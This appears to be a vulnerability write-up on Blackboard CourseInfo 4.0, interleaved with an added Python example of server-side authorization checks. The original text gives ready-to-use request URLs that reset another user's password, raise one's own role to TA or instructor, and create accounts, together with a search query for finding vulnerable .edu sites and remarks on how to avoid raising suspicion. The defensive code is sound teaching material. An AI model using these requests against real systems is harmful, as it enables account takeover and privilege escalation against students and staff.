DESCRIPTION

/bin/common/user_update_passwd.pl?user_id=VICTIM \
&firstname=FIRST&lastname=LAST&course_id=SOMECOURSE \
&password1=NEWPASSWD&password2=NEWPASSWD

will set the victim's password to whatever you please. Of course the downside
to this is that the next time the user attempts to log in and his/her password
doesn't work, some suspicion is bound to arise. Another thing you can do is
change your "role". Example:

/bin/common/user_update_admin.pl?user_id=MYID \
&course_id=SOMECOURSE&role=T&available_ind=Y
will up my "role" to TA. 's' will change you back to a student, and 'g' will
make you an instructor (grader?) (I guess Blackboard decided to get sneaky here
and not to use the obvious 'i' for instructor).
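Both scripts above trust the user_id and role values carried in the query string. As an added example, not Blackboard's code, the following Python sketches the server-side authorization checks those two handlers appear to lack: the decision is made from the authenticated session, not from request parameters, and defaults to deny. The role letters follow the text; their ranking, the Session and Decision types and the per-course role store are assumptions constructed for this example.

```python
"""Authorization checks for self-service account update handlers.

Added example, not Blackboard code. Models the two handlers described on the
page (password update, role update) with the check they were missing: who may
change what is decided from the authenticated session, never from the user_id
or role parameters supplied in the query string.
"""
from dataclasses import dataclass

# Role letters as described on the page; the ordering is this example's assumption.
ROLE_RANK = {"S": 0, "T": 1, "G": 2}   # student < TA < instructor


@dataclass(frozen=True)
class Session:
    """Constructed stand-in for the server-side session (not a request parameter)."""
    user_id: str
    course_roles: dict  # course_id -> role letter of the logged-in user


@dataclass
class Decision:
    allowed: bool
    reason: str  # kept so denied attempts can be written to an audit log


def can_update_password(session, params):
    """Password change: only the account owner, or an instructor of the course
    named in the request, may set that user's password. Defaults to deny."""
    target = params.get("user_id")
    if not target:
        return Decision(False, "missing user_id")
    if params.get("password1") != params.get("password2"):
        return Decision(False, "password confirmation mismatch")
    if target == session.user_id:
        return Decision(True, "owner")
    course = params.get("course_id")
    if session.course_roles.get(course) == "G":
        return Decision(True, "instructor of %s" % course)
    return Decision(False, "%s may not change password of %s" % (session.user_id, target))


def can_update_role(session, params):
    """Role change: only an instructor of the course may assign roles there,
    and nobody may grant a role above their own. Defaults to deny."""
    course = params.get("course_id")
    new_role = (params.get("role") or "").upper()   # page shows both 'T' and 's'
    if new_role not in ROLE_RANK:
        return Decision(False, "unknown role %r" % new_role)
    actor_role = session.course_roles.get(course)
    if actor_role != "G":
        return Decision(False, "only instructors may assign roles in %s" % course)
    if ROLE_RANK[new_role] > ROLE_RANK[actor_role]:
        return Decision(False, "cannot grant a role above own")
    return Decision(True, "instructor of %s" % course)


if __name__ == "__main__":
    # Constructed sample: a student session trying the requests shown on the page.
    student = Session("MYID", {"SOMECOURSE": "S"})
    print(can_update_password(student, {"user_id": "VICTIM", "course_id": "SOMECOURSE",
                                        "password1": "x", "password2": "x"}))
    print(can_update_role(student, {"user_id": "MYID", "course_id": "SOMECOURSE", "role": "T"}))
```

The `reason` field is what you would log: a stream of denials where the session user and the requested user_id differ is exactly the signal that distinguishes a mass password-reset attempt from ordinary self-service use.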
+"courseinfo v4.0" inurl:.edu

The only prerequisite needed to launch these attacks is a valid account, which
is no big deal at all since just about every site I've seen allows you to create
one. Even if the create account button wasn't on the main page, my guess is that
one could add an account with the following:

/bin/create_user_account.pl?runfirst=0&firstname=FIRST \
[email protected]&user_id=MYID \
&password1=MYPASS&password2=MYPASS
I thought that maybe the runfirst=0 determines whether or not the account being
created is the first one or not. I imagine that the first account gets some kind
of special privileges, however feeding it a value of '1' doesn't seem to have
any effect.